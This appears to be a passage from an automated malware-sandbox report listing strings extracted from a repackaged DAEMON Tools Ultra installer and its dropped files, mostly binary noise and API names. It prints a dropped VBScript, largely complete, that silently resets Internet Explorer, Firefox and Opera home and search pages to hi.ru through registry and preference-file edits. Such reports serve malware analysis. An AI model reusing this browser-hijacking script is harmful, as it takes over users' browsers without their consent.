Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M:dwpz{Hs

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M;MMmv{U[}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

m[h.%]\#4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

mgB>:a,}5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MM/dd/yy

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Mscoree.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

mscoree.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

msctls_progress32

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

MSVBVM60.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

MX}|7!-f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

M|o#bq!P:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n-Z.[j.HV?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n0I`j}{-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

N:$`//U2l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

n="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b1</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Nd![qF~{,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nmSg!%":\&pq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nO/zDzt}S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nod}*]t:/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nP1([Pr7d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

nsExec.dll

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

ntime Error!Program:

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

O,KmP!eQ}&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

O-"(>(x%@~W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

o=|/,wN)'[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

O_3ap...

Ansi based on Image Processing (screen_4.png)

oader@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

oB@D0O@|{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

odo^PQ\PO\s]_sss

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

oem<.inf

Unicode based on Runtime Data (dtinst.exe )

olnnh^W:>[bjnnljkm

Ansi based on Dropped File (Uninstall.exe.212096218)

on@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allo

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

OO i|@2R`/u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ools Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ops:GetPEFile

Unicode based on Dropped File (JSSys3.dll.204366558)

Option ExplicitConst HKEY_CURRENT_USER = &H80000001Const HKEY_LOCAL_MACHINE = &H80000002Const ForReading = 1Const ForWriting = 2Const ForAppending = 8Const strHomePage = "http://hi.ru/?10"Const strSearch = "http://hi.ru/search/?q={sear

Ansi based on Runtime Data (ChangeStartPage.exe )

Option ExplicitConst HKEY_CURRENT_USER = &H80000001Const HKEY_LOCAL_MACHINE = &H80000002Const ForReading = 1Const ForWriting = 2Const ForAppending = 8Const strHomePage = "http://hi.ru/?10"Const strSearch = "http://hi.ru/search/?q={searchTerms}"Const nomerchrome = "4"Dim strComputerDim objSWbemLocatorDim objSWbemServicesExDim objSWbemObjectExDim objFSODim objINIEditSet objSWbemLocator = WScript.CreateObject("WbemScripting.SWbemLocator")Set objSWbemServicesEx = objSWbemLocator.ConnectServer(strComputer, "root\default")Set objSWbemObjectEx = objSWbemServicesEx.Get("StdRegProv")Set objFSO = WScript.CreateObject("Scripting.FileSystemObject")Set objINIEdit = WScript.CreateObject("JSSys3.INIEdit")Dim iecheckDim firefoxcheckDim operacheckDim chromecheckDim amigocheckChangeIEHomePageChangeFirefoxHomePageChangeOperaHomePageChangeIESearchPageSet objINIEdit = NothingSet objFSO = NothingSet objSWbemObjectEx = NothingSet objSWbemServicesEx = NothingSet objSWbemLocator = NothingWScript.Quit 0'=============================================================================Function PRG_Isx64 if lcase(gWShell.Environment("SYSTEM")("Processor_Architecture")) = "amd64" Then PRG_Isx64 = True else PRG_Isx64 = False End ifEnd Function'=============================================================================Sub ChangeIEHomePage()If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Start Page", strHomePage) = 0 Then iecheck = 1'WScript.Echo "Internet Explorer home page set succesfully"Else'WScript.Echo "Can't set Internet Explorer home page"End IfEnd Sub'=============================================================================Sub ChangeIESearchPage()If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Search Page", strSearch) = 0 Then'WScript.Echo "Internet Explorer search page set succesfully"Else'WScript.Echo "Can't set Internet Explorer search page"End IfEnd Sub'=============================================================================Sub ChangeFirefoxHomePage()Dim strCurrentVersionDim strProfilesFileNameDim boolFoundDim strSectionDim strProfilePathDim strPrefsPathDim objRegExp_HomePageDim strContentIf objSWbemObjectEx.GetStringValue(HKEY_LOCAL_MACHINE, "SOFTWARE\Mozilla\Mozilla Firefox", "CurrentVersion", strCurrentVersion) = 0 ThenstrProfilesFileName = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Mozilla\Firefox\profiles.ini"If objFSO.FileExists(strProfilesFileName) ThenboolFound = FalseFor Each strSection In Split(objINIEdit.GetIniSectionNames(strProfilesFileName), vbNullChar)If objINIEdit.GetIniVal(strProfilesFileName, strSection, "Default") = "1" ThenboolFound = TrueExit ForEnd IfNextIf Not boolFound ThenstrSection = "Profile0"End IfSelect Case objINIEdit.GetIniVal(strProfilesFileName, strSection, "IsRelative")Case "0"strProfilePath = objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path")Case "1"strProfilePath = objFSO.BuildPath(objFSO.GetParentFolderName(strProfilesFileName), objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path"))Case Else'WScript.Echo "Can't find Firefox default profile"Exit SubEnd SelectstrPrefsPath = objFSO.BuildPath(strProfilePath, "prefs.js")If objFSO.FileExists(strPrefsPath) ThenSet objRegExp_HomePage = WScript.CreateObject("VBScript.RegExp")With objRegExp_HomePage.Global = False.IgnoreCase = True.Pattern = "(user_pref\(""browser\.startup\.homepage"", )(.*)(\);)"End WithWith objFSO.OpenTextFile(strPrefsPath, ForReading)strContent = .ReadAll().CloseEnd WithIf objRegExp_HomePage.Test(strContent) ThenWith objFSO.OpenTextFile(strPrefsPath, ForWriting).Write objRegExp_HomePage.Replace(strContent, "$1""" & strHomePage & """$3").CloseEnd WithElseWith objFSO.OpenTextFile(strPrefsPath, ForAppending).WriteLine "user_pref(""browser.startup.homepage"", """ & strHomePage & """);".CloseEnd WithEnd IfSet objRegExp_HomePage = Nothingfirefoxcheck = 1'WScript.Echo "Firefox home page set succesfully"Else'WScript.Echo "Can't find Firefox preference file [" & strPrefsPath & "]"End IfElse'WScript.Echo "Can't find Firefox profiles file [" & strProfilesFileName & "]"End IfElse'WScript.Echo "Can't find Mozilla Firefox"End IfEnd Sub'=============================================================================Sub ChangeOperaHomePage()Dim strPrefsPathstrPrefsPath = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Opera\Opera\operaprefs.ini"If objFSO.FileExists(strPrefsPath) ThenIf objINIEdit.WriteIniVal(strPrefsPath, "User Prefs", "Home URL", strHomePage) Thenoperacheck = 1'WScript.Echo "Opera home page set succesfully"Else'WScript.Echo "Can't set Opera home page"End IfElse'WScript.Echo "Can't find Opera preference file [" & strPrefsPath & "]"End IfEnd Sub

Ansi based on Dropped File (start72urez3kr.vbs)

o{WEAa!F|{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P NX"YsQ))/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P,YC;JM.[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p..@KmoQZ!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

P.u}aCSAB

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

p]D\J^@Ry

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

pb)h{O,um

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PE file version.

Ansi based on Dropped File (JSSys3.dll.204366558)

PE file version.WW+

Ansi based on Dropped File (JSSys3.dll.204366558)

pe]l;2B[_z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

pHBE[w1P=}hK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

pKNFE>;;::

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Play a .WAV file.

Ansi based on Dropped File (JSSys3.dll.204366558)

Play a .WAV file.W'

Ansi based on Dropped File (JSSys3.dll.204366558)

Please wait while Setup is loading...

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PnPDriverImportError

Unicode based on Runtime Data (dtinst.exe )

POH@wn@A<ijg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

PortUseAuth

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ProxyPort

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

p{;X!6mzA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

q-7v(rrg)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

qe&:uf@yk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QK xZ]LQlK{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

QK1*4nj)p[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

qoEE;>::

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Q}@I:+O2MM5xn.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r8{.S3Y%A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

r@ATL@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

r^ Y/A%]V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rack-ADMIN@CRACK]

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

RegCloseKey

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegCreateKeyA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegCreateKeyExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegCreateKeyExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegCreateKeyTransactedW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegDeleteKeyA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegDeleteKeyExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00409000.00000004.mdmp)

RegDeleteKeyExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegDeleteKeyTransactedW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegDeleteKeyW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegDeleteSubkey

Ansi based on Dropped File (JSSys3.dll.204366558)

RegEnumKeyA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegEnumKeyExA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegEnumKeyW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegGetValue

Ansi based on Dropped File (JSSys3.dll.204366558)

RegListKeys

Ansi based on Dropped File (JSSys3.dll.204366558)

RegListStringDataWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

RegOpenKeyA

Ansi based on Dropped File (JSSys3.dll.204366558)

RegOpenKeyExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RegOpenKeyTransactedW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

RegQueryInfoKeyA

Ansi based on Dropped File (JSSys3.dll.204366558)

regsvr32.exe

Unicode based on Runtime Data (HiRu.exe )

RegWriteValueWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns comma-delimited list of running processes on 95/98/ME.

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns comma-delimited list of running processes on 95/98/ME.0

Ansi based on Dropped File (JSSys3.dll.204366558)

Returns path of default program for a given file extension.WWW"

Ansi based on Dropped File (JSSys3.dll.204366558)

ri]{_

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

RiZ@)V6=L?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

RlO}(ZXzq]W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rmqvUhQ[m\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rnH+p)1:(iD{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

rP)$uZ:u<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Rs)[tjw9,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Runtime Error!Program:

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

S![GlVwI!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S)S\CH:H0&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s@5\?`kb:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s@_W@std@@V?$allocator@_W@2@@io@boost@@VNo_Op@?$basic_oaltstringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@23@@detail@boost@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

S[[88;;654,33,,+,,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S[t84<5355++.++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Select Case objINIEdit.GetIniVal(strProfilesFileName, strSection, "IsRelative")

Ansi based on Dropped File (start72urez3kr.vbs)

Service started/resumed

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ServiceBinary = %12%\dtultrascsibus.sys

Ansi based on Dropped File (SET4F37.tmp)

Set objFSO = WScript.CreateObject("Scripting.FileSystemObject")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objINIEdit = WScript.CreateObject("JSSys3.INIEdit")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objRegExp_HomePage = WScript.CreateObject("VBScript.RegExp")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemLocator = WScript.CreateObject("WbemScripting.SWbemLocator")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemObjectEx = objSWbemServicesEx.Get("StdRegProv")

Ansi based on Dropped File (start72urez3kr.vbs)

Set objSWbemServicesEx = objSWbemLocator.ConnectServer(strComputer, "root\default")

Ansi based on Dropped File (start72urez3kr.vbs)

Sets Desk wallpaper. Takes path of BMP file and style setting.

Ansi based on Dropped File (JSSys3.dll.204366558)

Sets Desktop back color. Takes 6-char. hex code.

Ansi based on Dropped File (JSSys3.dll.204366558)

Sets Desktop back color. Takes 6-char. hex code.WW

Ansi based on Dropped File (JSSys3.dll.204366558)

Settings.reg

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

setupapi.app.log

Unicode based on Runtime Data (dtinst.exe )

setupapi.dev.log

Unicode based on Runtime Data (dtinst.exe )

SetupDiGetDeviceRegistryPropertyW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

SetupDiGetINFClassW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Shell_TrayWnd

Unicode based on Dropped File (JSSys3.dll.204366558)

SHGetFileInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

SHGetFileInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Shows a Save File dialogue.WWW7

Ansi based on Dropped File (JSSys3.dll.204366558)

Size of PE file in KB./

Ansi based on Dropped File (JSSys3.dll.204366558)

SM[;64;,353,.3++++++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

sMVZ{,eJ]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Software\Disc Soft\DAEMON Tools Ultra

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

SOFTWARE\Microsoft\Driver Signing

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Software\Microsoft\Windows\CurrentVersion

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Software\Microsoft\Windows\CurrentVersion\App Paths\

Unicode based on Dropped File (JSSys3.dll.204366558)

SP9:%$W@].

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ssembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel> </requestedPrivileges> </security> </trustInfo></assembly>

Ansi based on Dropped File (Tages.dll.423655889)

ST[88;83/53+.+++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

staller integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

start72urez3kr.vbs

Unicode based on Runtime Data (ChangeStartPage.exe )

stdole2.tlbWWWH

Ansi based on Dropped File (JSSys3.dll.204366558)

strContent = .ReadAll()

Ansi based on Dropped File (start72urez3kr.vbs)

strPrefsPath = objFSO.BuildPath(strProfilePath, "prefs.js")

Ansi based on Dropped File (start72urez3kr.vbs)

strPrefsPath = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Opera\Opera\operaprefs.ini"

Ansi based on Dropped File (start72urez3kr.vbs)

strProfilePath = objFSO.BuildPath(objFSO.GetParentFolderName(strProfilesFileName), objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path"))

Ansi based on Dropped File (start72urez3kr.vbs)

strProfilePath = objINIEdit.GetIniVal(strProfilesFileName, strSection, "Path")

Ansi based on Dropped File (start72urez3kr.vbs)

strProfilesFileName = WScript.CreateObject("Shell.Application").NameSpace("shell:AppData").Self.Path & "\Mozilla\Firefox\profiles.ini"

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeFirefoxHomePage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeIEHomePage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeIESearchPage()

Ansi based on Dropped File (start72urez3kr.vbs)

Sub ChangeOperaHomePage()

Ansi based on Dropped File (start72urez3kr.vbs)

System\CurrentControlSet\Control\Session Manager\WPA\PnP

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

SYSTEM\CurrentControlSet\Services\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

System\WPA\PnP

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

T |f`Y!,!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t%]ETE,L(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T81zS[(e

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T\f\z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T_?=\{tL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t`@N)nEw'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TargetPort

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

TargetPortalGroupTag

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

Template\_GrayTemplate.xaml?

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Text Files(*.txt)

Unicode based on Dropped File (JSSys3.dll.204366558)

TG<9EA@/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

time Error!Program:

Unicode based on Memory/File Scan (dtinst.exe , 00040537-00003780.00000000.41037.002D7000.00000002.mdmp)

Tjv]7C,:)bv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TS\compoOps

Ansi based on Dropped File (JSSys3.dll.204366558)

tSxt4;</300+..+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TYqf.@h>o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u@-6`{_/%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U`D1iE@@Lq]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Unable to get file info.

Unicode based on Dropped File (JSSys3.dll.204366558)

Undefined error creating File object.

Unicode based on Dropped File (JSSys3.dll.204366558)

Uninstall.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

uQoV/\3O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

US[88;;43533.++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

usb.inf

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

USt[8;;335/,..++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uUGKzB=.9@%[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v!!!!!!!!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v&&&#&##########!###!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v(e6t|(T}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V.ozGg\-c|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V:^:Y5(=kg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V?$CComPtr@UIDSAsyncResultHandler@@@ATL@@@_mfi@boost@@V?$list2@V?$value@PAVCDSDeviceManager@@@_bi@boost@@V?$value@V?$CComPtr@UIDSAsyncResultHandler@@@ATL@@@23@@_bi@3@@_bi@boost@@@detail@boost@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

vap!/WCs_>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vB%%% %Bw{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VBA6.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

VC]X;;!^>1N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vd_)wK"t\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

verifying installer: %d%%

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Version of software product to which PE file belongs.

Ansi based on Dropped File (JSSys3.dll.204366558)

Version of software product to which PE file belongs.W2

Ansi based on Dropped File (JSSys3.dll.204366558)

VERSION.dll

